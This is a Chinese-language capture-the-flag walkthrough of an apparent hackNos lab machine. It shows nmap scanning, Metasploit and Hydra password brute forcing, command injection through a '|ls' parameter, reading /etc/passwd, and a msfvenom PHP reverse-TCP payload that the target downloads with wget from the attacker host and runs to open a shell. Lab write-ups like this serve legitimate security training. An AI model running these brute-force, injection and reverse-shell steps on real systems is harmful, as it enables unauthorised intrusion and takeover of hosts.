一、信息收集
步骤一:主机发现
nmap 192.168.7.0/24
步骤二:端口扫描
nmap 192.168.7.209 -p-
只有21,22,80三个端口开放
步骤三:尝试使用弱口令ftp/ftp连接ftp服务器,成功但没有数据
步骤四:访问ip地址,点击TroubleShoot,发现登录框
步骤五:使用MSF进行登录爆破,需要将“Security@hackNos
”添加到字典文件中...爆破成功....
加入msf密码字典:
/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt
use auxiliary/scanner/http/http_login
show options # 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.1.93
exploit
步骤六:根据以上爆破出来的用户和密码 admin:Security@hackNos 进行登录
步骤七:看起来像是命令执行漏洞,Burp抓包测试,测试执行系统命令%7Cls
并查看out.php
文件中发现过滤规则...查看/etc/passwd
文件中发现recon
用户可以进行登录...
二、反弹shell
步骤八:使用MSF生成一个PHP木马并开启一个http
服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..
>>>攻击机操作
####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.153 lport=4444 -f raw > f4.php
####开启Web服务
python3 -m http.server 80
####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.153
exploit
python -c 'import pty; pty.spawn("/bin/bash")'
>>>目标靶机操作
wget http%3a//192.168.7.153:80/f4.php # 下载恶意文件
php f4.php # 运行恶意文件
步骤九:获取第一个Flag
...使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos
在Shell中进行用户身份切换或登录..
hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.209